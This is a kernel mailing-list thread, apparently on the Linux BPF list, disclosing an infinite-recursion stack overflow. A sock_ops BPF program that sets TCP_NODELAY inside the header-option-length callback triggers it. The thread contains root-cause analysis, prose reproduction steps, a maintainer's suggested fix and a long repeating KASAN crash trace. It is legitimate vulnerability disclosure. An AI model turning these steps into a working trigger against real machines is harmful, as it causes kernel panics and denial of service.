Re: Infinite Recursion / Kernel Stack Overflow in bpf_skops_hdr_opt_len() via TCP_NODELAY setsockopt

2 views
Skip to first unread message

Stanislav Fomichev

unread,
Apr 13, 2026, 11:55:48 AMApr 13
to Quan Sun, dan...@iogearbox.net, b...@vger.kernel.org, ddd...@hust.edu.cn, M2024...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, a...@kernel.org, and...@kernel.org, jiayua...@linux.dev
On 04/13, Quan Sun wrote:
> Our fuzzing found a Stack Guard Page hit / Infinite Recursion vulnerability
> in the Linux TCP BPF Subsystem. The issue is triggered when a
> `BPF_PROG_TYPE_SOCK_OPS` program is attached and uses the `bpf_setsockopt()`
> helper inside the `BPF_SOCK_OPS_HDR_OPT_LEN_CB` callback to set
> `TCP_NODELAY` on the associated socket. This creates a logical loop that
> unconditionally pushes pending frames and re-invokes the same option-length
> BPF callback until the kernel stack overflows.
>
> Reported-by: Quan Sun <202209...@std.uestc.edu.cn>
> Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
> Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
> Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
>
> ## Root Cause
>
> This vulnerability is caused by a semantic loop created by mixing BPF TCP
> hooks tightly bounded to transmission paths with auxiliary socket state
> mutations like TCP Nagle transitions.
>
> 1. A user loads a `BPF_PROG_TYPE_SOCK_OPS` program and attaches it to a
> cgroup via `BPF_CGROUP_SOCK_OPS`.
> 2. The program intercepts `BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB` or
> `BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB` events and sets the
> `BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG` on the socket to enable custom TCP
> header options injection.
> 3. During the standard TCP frame transmission process (e.g., when sending
> data), the kernel needs to calculate the header's precise length. To
> retrieve the size of the injected option, `tcp_established_options()`
> invokes `bpf_skops_hdr_opt_len()`, which correctly triggers the
> `BPF_SOCK_OPS_HDR_OPT_LEN_CB` callback inside the BPF program.
> 4. Inside this callback, the malicious BPF program uses the
> `bpf_setsockopt()` helper function to force `TCP_NODELAY`.
> 5. Down in the kernel, setting `TCP_NODELAY` alters the connection context.
> Doing so invokes `__tcp_sock_set_nodelay()`, which unconditionally calls
> `tcp_push_pending_frames()` to immediately dispatch any packets that were
> previously waiting under the Nagle algorithm logic.
> 6. The recursive sub-call to `tcp_push_pending_frames()` initiates packet
> building again, causing a cascading invocation of
> `tcp_established_options()` -> `bpf_skops_hdr_opt_len()` ->
> `BPF_SOCK_OPS_HDR_OPT_LEN_CB` -> `bpf_setsockopt()` ->
> `tcp_push_pending_frames()`...
> 7. Without a depth limit or re-entrancy blocking condition on these socket
> callbacks, the repetitive nesting rapidly exhausts the kernel stack
> boundaries, pushing past the limits (hitting the `stack guard page`). The
> result is an immediate kernel panic leading to Denial of Service.
>
> #### Execution Flow Visualization
>
> ```text
> Vulnerability Execution Flow
> |
> |--- 1. `BPF_SOCK_OPS_HDR_OPT_LEN_CB` BPF Handler Executed
> | |\
> | | `-- `bpf_setsockopt(..., SOL_TCP, TCP_NODELAY, ...)`
> | |
> |--- 2. `do_tcp_setsockopt()` called by BPF Helper
> | |\
> | | `-- `__tcp_sock_set_nodelay()`
> | | |
> | | `-- `tcp_push_pending_frames()` (Immediate TCP transmission)
> | |
> |--- 3. Context switches to Frame Packaging
> | |\
> | | `-- `tcp_current_mss()`
> | | |
> | | `-- `tcp_established_options()`
> | |
> |--- 4. TCP Header calls BPF back again for size computation
> | |\
> | | `-- `bpf_skops_hdr_opt_len()`
> | | |
> | | `-- Invokes BPF Callback: `BPF_SOCK_OPS_HDR_OPT_LEN_CB`
> | | |
> | | `-- (Reverts to Step 1 directly) Infinite recursion depth.
> <==== KERNEL PANIC
> ```
>
> ## Reproduction Steps
>
> 1. Load a `BPF_PROG_TYPE_SOCK_OPS` BPF program that:
> - Checks the `op` field in the `bpf_sock_ops` context.
> - If the `op` is `BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB` or
> `BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB`, calls the
> `bpf_sock_ops_cb_flags_set()` helper to enable the
> `BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG`.
> - If the `op` is `BPF_SOCK_OPS_HDR_OPT_LEN_CB`, calls the
> `bpf_setsockopt()` helper to forcefully enable `TCP_NODELAY`.
> 2. Attach the loaded program to a chosen cgroup directory using
> `BPF_CGROUP_SOCK_OPS`.
> 3. Trigger a standard TCP connection (e.g., using `connect()`) within the
> targeted cgroup to establish the socket and trigger the initial established
> callbacks.
> 4. Force a packet transmission (e.g., using `send()`). This forces the
> kernel to compute the MSS and invoke the option length callback.
> 5. The forced `TCP_NODELAY` inside the callback will trap the kernel in an
> infinite recursive call sequence traversing `tcp_push_pending_frames()` and
> `bpf_skops_hdr_opt_len()` until the stack overflows, leading to a stack
> guard page crash.

The easiest fix is to probably return early from tcp_push_pending_frames
when has_current_bpf_ctx()?

Quan Sun

unread,
Apr 14, 2026, 7:16:15 AMApr 14
to dan...@iogearbox.net, b...@vger.kernel.org, ddd...@hust.edu.cn, M2024...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, a...@kernel.org, and...@kernel.org, jiayua...@linux.dev
## KASAN Report

```text
[ 138.173123][ C0] BUG: TASK stack guard page was hit at
ffa000000ceaff88 (stack is ffa000000ceb00)
[ 138.173140][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 138.173151][ C0] CPU: 0 UID: 0 PID: 9894 Comm: poc Not tainted
7.0.0-rc5-g6f6c794d0ff0 #5 PREEMP
[ 138.173164][ C0] Hardware name: QEMU Standard PC (i440FX + PIIX,
1996), BIOS 1.15.0-1 04/01/2014
[ 138.173169][ C0] RIP: 0010:mark_lock+0x1d/0xae0
[ 138.173194][ C0] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 55
48 89 e5 41 57 41 56 41 55 41 55
[ 138.173204][ C0] RSP: 0018:ffa000000ceaff90 EFLAGS: 00010086
[ 138.173213][ C0] RAX: 72760a0d8792c400 RBX: ff1100002fa255d8 RCX:
ffffffff96d71118
[ 138.173219][ C0] RDX: 0000000000000008 RSI: ff1100002fa258a8 RDI:
ff1100002fa24a80
[ 138.173226][ C0] RBP: ffa000000ceb0028 R08: 0000000000000000 R09:
0000000000000000
[ 138.173232][ C0] R10: 0000000000000000 R11: 0000000000000007 R12:
ff1100002fa258a8
[ 138.173238][ C0] R13: 0000000000000000 R14: 0000000000000012 R15:
0000000000000003
[ 138.173244][ C0] FS: 00007f1ea5b60740(0000)
GS:ff110000cd71d000(0000) knlGS:0000000000000000
[ 138.173255][ C0] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 138.173262][ C0] CR2: ffa000000ceaff88 CR3: 0000000027657000 CR4:
0000000000753ef0
[ 138.173268][ C0] PKRU: 55555554
[ 138.173271][ C0] Call Trace:
[ 138.173275][ C0] <TASK>
[ 138.173280][ C0] __lock_acquire+0x47d/0x2740
[ 138.173295][ C0] lock_acquire+0x1ba/0x360
[ 138.173305][ C0] ? ip_dst_mtu_maybe_forward.constprop.0+0x25/0x6f0
[ 138.173326][ C0] ip_dst_mtu_maybe_forward.constprop.0+0x36/0x6f0
[ 138.173338][ C0] ? ip_dst_mtu_maybe_forward.constprop.0+0x25/0x6f0
[ 138.173350][ C0] ? __pfx_ipv4_mtu+0x10/0x10
[ 138.173360][ C0] tcp_current_mss+0x40e/0x490
[ 138.173375][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.173395][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.173410][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.173432][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.173445][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.173458][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.173469][ C0] __bpf_setsockopt+0x158/0x220
[ 138.173479][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.173491][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.173504][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.173514][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.173535][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.173553][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.173567][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.173584][ C0] tcp_established_options+0x7c4/0xae0
[ 138.173598][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.173614][ C0] tcp_current_mss+0x1d9/0x490
[ 138.173628][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.173648][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.173662][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.173684][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.173696][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.173709][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.173720][ C0] __bpf_setsockopt+0x158/0x220
[ 138.173729][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.173741][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.173753][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.173762][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.173778][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.173796][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.173810][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.173827][ C0] tcp_established_options+0x7c4/0xae0
[ 138.173841][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.173857][ C0] tcp_current_mss+0x1d9/0x490
[ 138.173870][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.173890][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.173905][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.173927][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.173938][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.173951][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.173962][ C0] __bpf_setsockopt+0x158/0x220
[ 138.173972][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.173984][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.173995][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174004][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174025][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174044][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174057][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174074][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174088][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174104][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174117][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174137][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174152][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174174][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174186][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174199][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174210][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174219][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174231][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174243][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174251][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174268][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174286][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174299][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174316][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174330][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174346][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174359][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174379][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174394][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174416][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174428][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174440][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174452][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174461][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174473][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174485][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174493][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174509][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174527][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174541][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174558][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174572][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174588][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174601][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174621][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174636][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174658][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174670][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174682][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174694][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174703][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174715][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174727][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174735][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174751][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.174769][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.174783][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.174800][ C0] tcp_established_options+0x7c4/0xae0
[ 138.174813][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.174829][ C0] tcp_current_mss+0x1d9/0x490
[ 138.174843][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.174863][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.174877][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.174899][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.174911][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.174923][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.174935][ C0] __bpf_setsockopt+0x158/0x220
[ 138.174944][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.174956][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.174968][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.174976][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.174992][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175015][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175028][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175045][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175059][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175075][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175088][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175108][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175123][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175145][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175156][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175169][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175180][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175189][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175201][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175213][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175222][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175238][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175256][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175269][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175286][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175300][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175316][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175329][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175349][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175363][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175385][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175397][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175410][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175421][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175430][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175442][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175454][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175462][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175478][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175496][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175510][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175529][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175543][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175559][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175573][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175593][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175607][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175629][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175641][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175654][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175665][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175674][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175686][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175698][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175707][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175723][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175741][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175754][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.175771][ C0] tcp_established_options+0x7c4/0xae0
[ 138.175785][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.175801][ C0] tcp_current_mss+0x1d9/0x490
[ 138.175814][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.175834][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.175849][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.175871][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.175883][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.175895][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.175907][ C0] __bpf_setsockopt+0x158/0x220
[ 138.175916][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.175928][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.175940][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.175948][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.175964][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.175982][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.175995][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176020][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176034][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176050][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176064][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176084][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176098][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176121][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176132][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176145][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176157][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176166][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176178][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176190][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176198][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176214][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176232][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176246][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176263][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176277][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176293][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176306][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176326][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176341][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176363][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176375][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176387][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176399][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176408][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176420][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176432][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176440][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176456][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176474][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176488][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176505][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176519][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176534][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176548][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176568][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176582][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176604][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176616][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176629][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176640][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176649][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176661][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176673][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176681][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176697][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176715][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176729][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176746][ C0] tcp_established_options+0x7c4/0xae0
[ 138.176760][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.176776][ C0] tcp_current_mss+0x1d9/0x490
[ 138.176789][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.176809][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.176823][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.176845][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.176857][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.176870][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.176881][ C0] __bpf_setsockopt+0x158/0x220
[ 138.176890][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.176902][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.176914][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.176923][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.176939][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.176957][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.176970][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.176987][ C0] tcp_established_options+0x7c4/0xae0
[ 138.177001][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.177025][ C0] tcp_current_mss+0x1d9/0x490
[ 138.177038][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.177051][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177068][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.177083][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.177097][ C0] ? kernel_text_address+0x52/0xa0
[ 138.177111][ C0] ? do_raw_spin_lock+0x130/0x270
[ 138.177124][ C0] ? find_held_lock+0x2b/0x80
[ 138.177140][ C0] ? _raw_spin_unlock_irqrestore+0x5d/0x80
[ 138.177161][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.177177][ C0] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 138.177191][ C0] ? stack_depot_save_flags+0x433/0xa30
[ 138.177204][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.177216][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.177228][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177240][ C0] __bpf_setsockopt+0x158/0x220
[ 138.177249][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.177258][ C0] ? lock_release+0x22d/0x300
[ 138.177271][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.177283][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.177291][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.177307][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.177325][ C0] bpf_skops_hdr_opt_len+0x303/0x440
[ 138.177339][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.177354][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177366][ C0] tcp_established_options+0x7c4/0xae0
[ 138.177379][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.177395][ C0] tcp_current_mss+0x1d9/0x490
[ 138.177409][ C0] ? __pfx_tcp_current_mss+0x10/0x10
[ 138.177425][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177437][ C0] ? is_bpf_text_address+0x9b/0x1b0
[ 138.177449][ C0] do_tcp_setsockopt+0x224b/0x2c40
[ 138.177464][ C0] ? __pfx_do_tcp_setsockopt+0x10/0x10
[ 138.177480][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.177496][ C0] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 138.177510][ C0] ? stack_depot_save_flags+0x433/0xa30
[ 138.177523][ C0] ? kasan_save_stack+0x34/0x50
[ 138.177537][ C0] ? kasan_save_stack+0x24/0x50
[ 138.177550][ C0] ? kasan_save_track+0x14/0x30
[ 138.177564][ C0] ? __kasan_kmalloc+0xaa/0xb0
[ 138.177579][ C0] sol_tcp_sockopt+0x6bd/0xad0
[ 138.177591][ C0] ? __pfx_sol_tcp_sockopt+0x10/0x10
[ 138.177603][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177615][ C0] __bpf_setsockopt+0x158/0x220
[ 138.177624][ C0] ? __pfx___bpf_setsockopt+0x10/0x10
[ 138.177636][ C0] bpf_sock_ops_setsockopt+0x116/0x210
[ 138.177648][ C0] bpf_prog_62c2f8b7eac2f54e+0x7d/0x81
[ 138.177656][ C0] __cgroup_bpf_run_filter_sock_ops+0x2c3/0x990
[ 138.177672][ C0] ? __pfx___cgroup_bpf_run_filter_sock_ops+0x10/0x10
[ 138.177690][ C0] bpf_skops_hdr_opt_len+0x303/0x440
